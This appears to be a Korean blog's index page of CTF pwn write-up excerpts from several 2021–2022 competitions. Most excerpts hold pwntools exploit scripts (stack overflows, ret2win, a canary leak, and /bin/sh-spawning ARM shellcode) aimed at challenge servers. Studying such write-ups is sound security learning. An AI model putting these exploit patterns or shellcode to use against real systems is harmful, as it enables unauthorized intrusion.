Codegate 2022 - PWN(ARVM)

CTF-Writeup 2022. 2. 28. 23:59

직접 푼 문제 from pwn import * context.log_level='debug' p = remote('15.165.92.159', 1234) #p = remote('localhost', 1234) #gdb.attach(p) test_shellcode = "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x78" p.sendafter('> ', "\x00"*0x10+test_shellcode + "A"*(0x90-len(test_shellcode))) p.sendlineafter('> ', '1') p.recvuntil('code : ') secre..

Killer Queen CTF 2021 Write-Up

CTF-Writeup 2021. 10. 30. 14:20

후기 정말 최악이였다... pwn문제는 3~4개 풀었는데 거의 3시간 넘게 서버가 다운되고 거의 대회 초반부터 remote 서버 주소를 주지 않아 계속 기다리다가 그냥 잤다.. PWN A kind of magic undefined8 main(void) { char local_38 [44]; uint local_c; local_c = 0; puts("Is this a kind of magic? What is your magic?: "); fflush(stdout); fgets(local_38,0x40,stdin); printf("You entered %s\n",local_38); printf("Your magic is: %d\n",(ulong)local_c); fflush(stdout); if (local..

Article Thumbnail
2021 TSG CTF Write-up

CTF-Writeup 2021. 10. 5. 16:39

총 PWN 1문제를 풀었다... PWN에서 cHeap하고 coffee라는 문제가 있는데 coffee는 fsb관련 문제고 libc base까지 구했고 main으로 돌리면서 got overwrite해야하는것까지는 알았는데 도저히 할 방법을 몰라서 못풀었던 문제 cHeap은 tcache관련 문제인거 같은데 못풀었다.. 나도 잘하고 싶다... coffee와 cHeap은 다시 풀어봐야겠다.. PWN Beginner's Pwn 2021 from pwn import * p = remote('34.146.101.4', 30007) #p = process('./chall') payload = "\x00"*100 p.send(payload) p.interactive()

Article Thumbnail
ACSC(Asia Cyber Security Challenge) 2021 Writeup

CTF-Writeup 2021. 9. 19. 19:14

PWN filtered 아주 쉬웠던 문제이다. Integer Overflow가 일어나 입력받는 값의 사이즈를 매우 크게 정할 수 있으며 이를 통해 win함수를 호출해주면 끝 from pwn import * p = remote('filtered.chal.acsc.asia', 9001) e = ELF('./filtered') win = 0x4011d6 payload = b"A"*280 payload += p64(win) p.sendlineafter('Size: ', '-1') p.sendlineafter('Data: ', payload) p.interactive() histogram 제일 시간을 많이 썼던 문제. read_data에서 map의 인덱스를 -으로 만들어서 원하는 함수의 값을 overwrite하는..

Article Thumbnail
2021 tamuctf Writeup

CTF-Writeup 2021. 9. 17. 00:42

PWN warmup from pwn import * p = remote('194.5.207.56',7000) payload = "A"*80 p.sendlineafter('name:', payload) p.interactive() Babypwn from pwn import * p = remote('194.5.207.56',7010) wow = 0x4012ec payload = b"" p.sendlineafter('name: ', b"A"*0x1c+p64(0xcafe)) payload += b"B"*128 payload += b"C"*8 payload += p64(wow) p.sendlineafter(b';;)', payload) p.interactive() canary(이건 못품) 작성했던 코드 from ..

Article Thumbnail
Grabcon2021 Write-up

CTF-Writeup 2021. 9. 17. 00:22

PWN cancancan 풀고나서 바로 롸업을 안써서 어케 풀었는지 까먹었따.. 아마 카나리 릭 하고 푸는 문제인듯 from pwn import * p = remote('35.246.42.94', 31337) e = ELF('./cancancan') win = 0x8049236 payload = b"" payload += b"A"*99+b"B" p.sendlineafter('me???\n', payload) p.recv(101) canary = u32(b"\x00"+p.recv(3)) log.info(f'canary: {hex(canary)}') payload1 = b"C"*100 payload1 += p32(canary) payload1 += b"D"*12 payload1 += p32(win) p.se..

Article Thumbnail
DCTF 2021 Write-up

CTF-Writeup 2021. 8. 23. 16:38

DCTF 2021 Write-UP 개인 사정으로 인해, 대회가 끝나고 풀었지만, 해답은 보지않았음 pinch_me from pwn import * #p = process('./pinch_me') p = remote('dctf1-chall-pinch-me.westeurope.azurecontainer.io', 7480) e = ELF('./pinch_me') payload = b'' payload += b'A'*24 payload += p64(0x1337C0DE) p.sendlineafter('dreaming?\n', payload) p.interactive()pwn_sanity_check from pwn import *..

corCTF 2021 Write-up

CTF-Writeup 2021. 8. 23. 12:15

이번에 크립토 1문제와 pwn 1문제를 풀었다. pwn에서는 Cshell문제만 풀었어도 좀 올라갔을텐데 공격 벡터를 찾지 못하였고 rev문제와 web문제는 풀지도 못하였다.. 공부를 더 열심히 해야할거 같다.. PWN 간단한 문제 ROP문제이다. int verify(EVP_PKEY_CTX *ctx,uchar *sig,size_t siglen,uchar *tbs,size_t tbslen) { int iVar1; char local_108 [256]; printf("Please enter your name: "); gets(local_108); iVar1 = strcmp(local_108,name); if (iVar1 == 0) { printf("Hi %s!\n",name); iVar1 = printf("Y..

Article Thumbnail
RARCTF 2021

CTF-Writeup 2021. 8. 10. 22:29

PWN from pwn import * p = remote('193.57.159.27', 43092) code =0x404068 p.sendlineafter('no]:', 'yes') payload = b"" payload += b"fffffffffff04068" p.sendlineafter('shoot?\n', payload) p.interactive() from pwn import * #p = process('./ret2winrars') p = remote('193.57.159.27', 30527) flag = 0x401166 payload = "A"*0x28 payload += p64(flag) p.sendlineafter(b'access:', payload) p.interactive() 제일 삽질..

Article Thumbnail
2021 ImaginaryCTF writeup

CTF-Writeup 2021. 7. 28. 13:35

Crypto나 misc 중에 프로그래밍을 이용한 문제 해결문제가 있었는데 많이 못풀었다... 100점짜리 문제들만 다 풀었어도 1000점은 넘었을텐데 아쉽다.. crypto와 misc 프로그래밍 문제를 풀면서 프로그래밍 능력 향상을 해야겠다.. PWN stackoverflow from pwn import * p = remote('chal.imaginaryctf.org', 42001) payload = "" payload += "A"*40 payload += p64(0x69637466) p.sendlineafter('color?\n', payload) p.interactive() fake_canary from pwn import * p = remote('chal.imaginaryctf.org',42002)..

Article Thumbnail